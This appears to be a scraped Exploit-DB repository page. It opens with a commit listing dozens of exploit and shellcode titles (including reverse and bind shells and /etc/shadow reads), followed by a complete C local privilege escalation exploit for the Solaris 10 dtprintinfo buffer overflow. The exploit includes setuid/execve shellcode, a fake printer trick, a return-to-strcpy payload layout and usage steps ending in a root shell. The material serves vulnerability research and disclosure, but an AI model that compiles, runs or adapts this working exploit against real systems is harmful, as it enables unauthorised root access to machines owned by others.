de260aeac6
95 changes to exploits/shellcodes Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC) AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC) Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC) WordPress Plugin WPGraphQL 1.3.5 - Denial of Service Sandboxie 5.49.7 - Denial of Service (PoC) WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC) iDailyDiary 4.30 - Denial of Service (PoC) RarmaRadio 2.72.8 - Denial of Service (PoC) DupTerminator 1.4.5639.37199 - Denial of Service (PoC) Color Notes 1.4 - Denial of Service (PoC) Macaron Notes great notebook 5.5 - Denial of Service (PoC) My Notes Safe 5.3 - Denial of Service (PoC) n+otes 1.6.2 - Denial of Service (PoC) Telegram Desktop 2.9.2 - Denial of Service (PoC) Mini-XML 3.2 - Heap Overflow Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (2) Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (3) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2) MariaDB 10.2 - 'wsrep_provider' OS Command Execution Microsoft Internet Explorer 11 and WPAD service 'Jscript.dll' - Use-After-Free Visual Studio Code 1.47.1 - Denial of Service (PoC) DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE) MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2) Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC) GNU Wget < 1.18 - Arbitrary File Upload (2) WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS) E-Learning System 1.0 - Authentication Bypass PEEL Shopping 9.3.0 - 'Comments' Persistent Cross-Site Scripting GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Persistent Cross-Site Scripting Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated) Library System 1.0 - Authentication Bypass Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE) GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit) Umbraco v8.14.1 - 'baseUrl' SSRF Cacti 1.2.12 - 'filter' SQL Injection GetSimple CMS Custom JS 0.1 - Cross-Site Request Forgery Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated) Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting Xmind 2020 - Persistent Cross-Site Scripting Tagstoo 2.0.1 - Persistent Cross-Site Scripting SnipCommand 0.1.0 - Persistent Cross-Site Scripting Moeditor 0.2.0 - Persistent Cross-Site Scripting Marky 0.0.1 - Persistent Cross-Site Scripting StudyMD 0.3.2 - Persistent Cross-Site Scripting Freeter 1.2.1 - Persistent Cross-Site Scripting Markright 1.0 - Persistent Cross-Site Scripting Markdownify 1.2.0 - Persistent Cross-Site Scripting Anote 1.0 - Persistent Cross-Site Scripting Subrion CMS 4.2.1 - Arbitrary File Upload Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated) Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver) CHIYU IoT Devices - Denial of Service (DoS) Zenario CMS 8.8.52729 - 'cID' SQL injection (Authenticated) TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal Atlassian Jira Server Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS) Scratch Desktop 3.17 - Remote Code Execution Church Management System 1.0 - Arbitrary File Upload (Authenticated) Phone Shop Sales Managements System 1.0 - Arbitrary File Upload Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS) WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated) KevinLAB BEMS 1.0 - Authentication Bypass Event Registration System with QR Code 1.0 - Authentication Bypass CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) Panasonic Sanyo CCTV Network Camera 2.03-0x - Cross-Site Request Forgery (Change Password) qdPM 9.2 - Password Exposure (Unauthenticated) ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) Movable Type 7 r.5002 - XMLRPC API OS Command Injection (Metasploit) GeoVision Geowebserver 5.3.3 - Local FIle Inclusion Simple Phone Book 1.0 - 'Username' SQL Injection (Unauthenticated) Umbraco CMS 8.9.1 - Directory Traversal Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Dolibarr ERP 14.0.1 - Privilege Escalation Compro Technology IP Camera - 'killps.cgi' Denial of Service (DoS) Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation Phpwcms 1.9.30 - Arbitrary File Upload Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes) Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes) Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes) Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes) Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes) Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes) Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes) Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes) Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes) Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)
356 lines
No EOL
9 KiB
C
356 lines
No EOL
9 KiB
C
# Exploit Title: Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation (2)
|
|
# Date: 2021-02-01
|
|
# Exploit Author: Marco Ivaldi
|
|
# Vendor Homepage: https://www.oracle.com/solaris/solaris10/
|
|
# Version: Solaris 10
|
|
# Tested on: Solaris 10 1/13 Intel
|
|
|
|
|
|
/*
|
|
* raptor_dtprintcheckdir_intel.c - Solaris/Intel 0day? LPE
|
|
* Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>
|
|
*
|
|
* "What we do in life echoes in eternity" -- Maximus Decimus Meridius
|
|
* https://patchfriday.com/22/
|
|
*
|
|
* Another buffer overflow in the dtprintinfo(1) CDE Print Viewer, leading to
|
|
* local root. This one was discovered by Marti Guasch Jimenez, who attended my
|
|
* talk "A bug's life: story of a Solaris 0day" presented at #INFILTRATE19 on
|
|
* May 2nd, 2019 (https://github.com/0xdea/raptor_infiltrate19).
|
|
*
|
|
* It's a stack-based buffer overflow in the check_dir() function:
|
|
* void __0FJcheck_dirPcTBPPP6QStatusLineStructPii(...){
|
|
* char local_724 [300];
|
|
* ...
|
|
* __format = getenv("REQ_DIR");
|
|
* sprintf(local_724,__format,param_2);
|
|
*
|
|
* "To trigger this vulnerability we need a printer present, we can also fake
|
|
* it with the lpstat trick. We also need at least one directory in the path
|
|
* pointed by the environment variable TMP_DIR. Finally, we just need to set
|
|
* REQ_DIR with a value of 0x720 of padding + value to overwrite EBP + value to
|
|
* overwrite EIP." -- Marti Guasch Jimenez
|
|
*
|
|
* This bug was likely fixed during the general cleanup of CDE code done by
|
|
* Oracle in response to my recently reported vulnerabilities. However, I can't
|
|
* confirm this because I have no access to their patches:/
|
|
*
|
|
* Usage:
|
|
* $ gcc raptor_dtprintcheckdir_intel.c -o raptor_dtprintcheckdir_intel -Wall
|
|
* [on your xserver: disable the access control]
|
|
* $ ./raptor_dtprintcheckdir_intel 192.168.1.1:0
|
|
* [on your xserver: double click on the fake "fnord" printer]
|
|
* [...]
|
|
* # id
|
|
* uid=0(root) gid=1(other)
|
|
* #
|
|
*
|
|
* Tested on:
|
|
* SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
|
|
* [previous Solaris versions are also likely vulnerable]
|
|
*/
|
|
|
|
#include <fcntl.h>
|
|
#include <link.h>
|
|
#include <procfs.h>
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <strings.h>
|
|
#include <unistd.h>
|
|
#include <sys/stat.h>
|
|
#include <sys/systeminfo.h>
|
|
#include <sys/types.h>
|
|
|
|
#define INFO1 "raptor_dtprintcheckdir_intel.c - Solaris/Intel 0day? LPE"
|
|
#define INFO2 "Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>"
|
|
|
|
#define VULN "/usr/dt/bin/dtprintinfo" // the vulnerable program
|
|
#define BUFSIZE 2048 // size of the evil env var
|
|
|
|
char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
|
|
/* double setuid() */
|
|
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
|
|
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
|
|
/* execve() */
|
|
"\x31\xc0\x50\x68/ksh\x68/bin"
|
|
"\x89\xe3\x50\x53\x89\xe2\x50"
|
|
"\x52\x53\xb0\x3b\x50\xcd\x91";
|
|
|
|
/* globals */
|
|
char *arg[2] = {"foo", NULL};
|
|
char *env[256];
|
|
int env_pos = 0, env_len = 0;
|
|
|
|
/* prototypes */
|
|
int add_env(char *string);
|
|
void check_zero(int addr, char *pattern);
|
|
int get_sc_addr(char *path, char **argv);
|
|
int search_ldso(char *sym);
|
|
int search_rwx_mem(void);
|
|
void set_val(char *buf, int pos, int val);
|
|
|
|
/*
|
|
* main()
|
|
*/
|
|
int main(int argc, char **argv)
|
|
{
|
|
char buf[BUFSIZE];
|
|
char platform[256], release[256], display[256];
|
|
int i, sc_addr;
|
|
|
|
int sb = ((int)argv[0] | 0xfff); /* stack base */
|
|
int ret = search_ldso("strcpy"); /* or sprintf */
|
|
int rwx_mem = search_rwx_mem(); /* rwx memory */
|
|
|
|
/* lpstat code to add a fake printer */
|
|
if (!strcmp(argv[0], "lpstat")) {
|
|
|
|
/* check command line */
|
|
if (argc != 2)
|
|
exit(1);
|
|
|
|
/* print the expected output and exit */
|
|
if(!strcmp(argv[1], "-v")) {
|
|
fprintf(stderr, "lpstat called with -v\n");
|
|
printf("device for fnord: /dev/null\n");
|
|
} else {
|
|
fprintf(stderr, "lpstat called with -d\n");
|
|
printf("system default destination: fnord\n");
|
|
}
|
|
exit(0);
|
|
}
|
|
|
|
/* helper program that prints argv[0] address, used by get_sc_addr() */
|
|
if (!strcmp(argv[0], "foo")) {
|
|
printf("0x%p\n", argv[0]);
|
|
exit(0);
|
|
}
|
|
|
|
/* print exploit information */
|
|
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
|
|
|
|
/* process command line */
|
|
if (argc != 2) {
|
|
fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
|
|
exit(1);
|
|
}
|
|
sprintf(display, "DISPLAY=%s", argv[1]);
|
|
|
|
/* prepare the evil env var */
|
|
memset(buf, 'A', sizeof(buf));
|
|
buf[sizeof(buf) - 1] = 0x0;
|
|
memcpy(buf, "REQ_DIR=", 8);
|
|
|
|
/* fill the envp, keeping padding */
|
|
add_env(sc);
|
|
add_env(buf);
|
|
add_env(display);
|
|
add_env("TMP_DIR=/tmp");
|
|
add_env("PATH=.:/usr/bin");
|
|
add_env("HOME=/tmp");
|
|
add_env(NULL);
|
|
|
|
/* calculate the shellcode address */
|
|
sc_addr = get_sc_addr(VULN, argv);
|
|
|
|
/* fill with ld.so.1 address, saved eip, and arguments */
|
|
for (i = 12; i < BUFSIZE - 20; i += 4) {
|
|
set_val(buf, i, ret); /* strcpy */
|
|
set_val(buf, i += 4, rwx_mem); /* saved eip */
|
|
set_val(buf, i += 4, rwx_mem); /* 1st argument */
|
|
set_val(buf, i += 4, sc_addr); /* 2nd argument */
|
|
}
|
|
|
|
/* we need at least one directory inside TMP_DIR to trigger the bug */
|
|
mkdir("/tmp/one_dir", S_IRWXU | S_IRWXG | S_IRWXO);
|
|
|
|
/* create a symlink for the fake lpstat */
|
|
unlink("lpstat");
|
|
symlink(argv[0], "lpstat");
|
|
|
|
/* print some output */
|
|
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
|
|
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
|
|
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
|
|
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
|
|
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
|
|
fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
|
|
fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
|
|
|
|
/* check for null bytes */
|
|
check_zero(sc_addr, "sc address");
|
|
|
|
/* run the vulnerable program */
|
|
execve(VULN, arg, env);
|
|
perror("execve");
|
|
exit(1);
|
|
}
|
|
|
|
/*
|
|
* add_env(): add a variable to envp and pad if needed
|
|
*/
|
|
int add_env(char *string)
|
|
{
|
|
int i;
|
|
|
|
/* null termination */
|
|
if (!string) {
|
|
env[env_pos] = NULL;
|
|
return env_len;
|
|
}
|
|
|
|
/* add the variable to envp */
|
|
env[env_pos] = string;
|
|
env_len += strlen(string) + 1;
|
|
env_pos++;
|
|
|
|
/* pad the envp using zeroes */
|
|
if ((strlen(string) + 1) % 4)
|
|
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
|
|
env[env_pos] = string + strlen(string);
|
|
env_len++;
|
|
}
|
|
|
|
return env_len;
|
|
}
|
|
|
|
/*
|
|
* check_zero(): check an address for the presence of a 0x00
|
|
*/
|
|
void check_zero(int addr, char *pattern)
|
|
{
|
|
if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
|
|
!(addr & 0xff000000)) {
|
|
fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
|
|
exit(1);
|
|
}
|
|
}
|
|
|
|
/*
|
|
* get_sc_addr(): get shellcode address using a helper program
|
|
*/
|
|
int get_sc_addr(char *path, char **argv)
|
|
{
|
|
char prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
|
|
char hex[11] = "\x00";
|
|
int fd[2], addr;
|
|
|
|
/* truncate program name at correct length and create a hard link */
|
|
prog[strlen(path)] = 0x0;
|
|
unlink(prog);
|
|
link(argv[0], prog);
|
|
|
|
/* open pipe to read program output */
|
|
if (pipe(fd) < 0) {
|
|
perror("pipe");
|
|
exit(1);
|
|
}
|
|
|
|
switch(fork()) {
|
|
|
|
case -1: /* cannot fork */
|
|
perror("fork");
|
|
exit(1);
|
|
|
|
case 0: /* child */
|
|
dup2(fd[1], 1);
|
|
close(fd[0]);
|
|
close(fd[1]);
|
|
execve(prog, arg, env);
|
|
perror("execve");
|
|
exit(1);
|
|
|
|
default: /* parent */
|
|
close(fd[1]);
|
|
read(fd[0], hex, sizeof(hex));
|
|
break;
|
|
}
|
|
|
|
/* check and return address */
|
|
if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) {
|
|
fprintf(stderr, "error: cannot read sc address from helper program\n");
|
|
exit(1);
|
|
}
|
|
return addr;
|
|
}
|
|
|
|
/*
|
|
* search_ldso(): search for a symbol inside ld.so.1
|
|
*/
|
|
int search_ldso(char *sym)
|
|
{
|
|
int addr;
|
|
void *handle;
|
|
Link_map *lm;
|
|
|
|
/* open the executable object file */
|
|
if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
|
|
perror("dlopen");
|
|
exit(1);
|
|
}
|
|
|
|
/* get dynamic load information */
|
|
if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
|
|
perror("dlinfo");
|
|
exit(1);
|
|
}
|
|
|
|
/* search for the address of the symbol */
|
|
if ((addr = (int)dlsym(handle, sym)) == NULL) {
|
|
fprintf(stderr, "sorry, function %s() not found\n", sym);
|
|
exit(1);
|
|
}
|
|
|
|
/* close the executable object file */
|
|
dlclose(handle);
|
|
|
|
check_zero(addr - 4, sym);
|
|
return addr;
|
|
}
|
|
|
|
/*
|
|
* search_rwx_mem(): search for an RWX memory segment valid for all
|
|
* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
|
|
*/
|
|
int search_rwx_mem(void)
|
|
{
|
|
int fd;
|
|
char tmp[16];
|
|
prmap_t map;
|
|
int addr = 0, addr_old;
|
|
|
|
/* open the proc filesystem */
|
|
sprintf(tmp,"/proc/%d/map", (int)getpid());
|
|
if ((fd = open(tmp, O_RDONLY)) < 0) {
|
|
fprintf(stderr, "can't open %s\n", tmp);
|
|
exit(1);
|
|
}
|
|
|
|
/* search for the last RWX memory segment before stack (last - 1) */
|
|
while (read(fd, &map, sizeof(map)))
|
|
if (map.pr_vaddr)
|
|
if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
|
|
addr_old = addr;
|
|
addr = map.pr_vaddr;
|
|
}
|
|
close(fd);
|
|
|
|
/* add 4 to the exact address null bytes */
|
|
if (!(addr_old & 0xff))
|
|
addr_old |= 0x04;
|
|
if (!(addr_old & 0xff00))
|
|
addr_old |= 0x0400;
|
|
|
|
return addr_old;
|
|
}
|
|
|
|
/*
|
|
* set_val(): copy a dword inside a buffer (little endian)
|
|
*/
|
|
void set_val(char *buf, int pos, int val)
|
|
{
|
|
buf[pos] = (val & 0x000000ff);
|
|
buf[pos + 1] = (val & 0x0000ff00) >> 8;
|
|
buf[pos + 2] = (val & 0x00ff0000) >> 16;
|
|
buf[pos + 3] = (val & 0xff000000) >> 24;
|
|
} |